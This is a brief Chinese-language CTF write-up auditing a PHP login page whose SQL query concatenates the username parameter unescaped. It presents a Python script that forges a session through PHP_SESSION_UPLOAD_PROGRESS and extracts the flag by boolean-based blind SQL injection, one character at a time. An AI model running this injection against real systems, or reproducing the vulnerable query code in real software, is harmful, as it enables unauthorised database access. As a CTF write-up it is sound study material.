source.zip得到源码。开始审计
在index.php中。对所有输入进行了addslashes转义。
在login.php中
<?php
!isset($_SESSION) AND die("Direct access on this script is not allowed!");
include 'db.php';
$sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="' . $_GET['username'] . '" and password="' . md5($_GET['password']) . '";';
$result = $con->query($sql);
function auth($user)
{
$_SESSION['username'] = $user;
return True;
}
($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND auth($row['username']) AND die('<meta http-equiv="refresh" content="0; url=?p=home" />')) OR ($con->close() AND die('Try again!'));
?>
仅仅只是判断是否存在session。
如果我们自己弄个session。那么这边的username就可控。
在学习session反序列化的时候。我们学过。PHP_SESSION_UPLOAD_PROGRESS
OK。就构造一个包含PHP_SESSION_UPLOAD_PROGRESS的POST请求。
import requests
url='http://e3ebe013-7cb3-4006-8d52-3aa8378449ea.node3.buuoj.cn/templates/login.php'
files={"file":"123"}
data={"PHP_SESSION_UPLOAD_PROGRESS":"123"}
cookies={"PHPSESSID":"123"}
for b in range(1,50):
for i in range(30,130):
params={"username":'test" or (ascii(substr((select group_concat(secret) from flag_tbl),'+str(b)+',1))='+str(i)+')#',
"password":"test"}
a=requests.post(url=url,files=files,data=data,cookies=cookies,params=params).text
if 'meta' in a:
print(chr(i))
break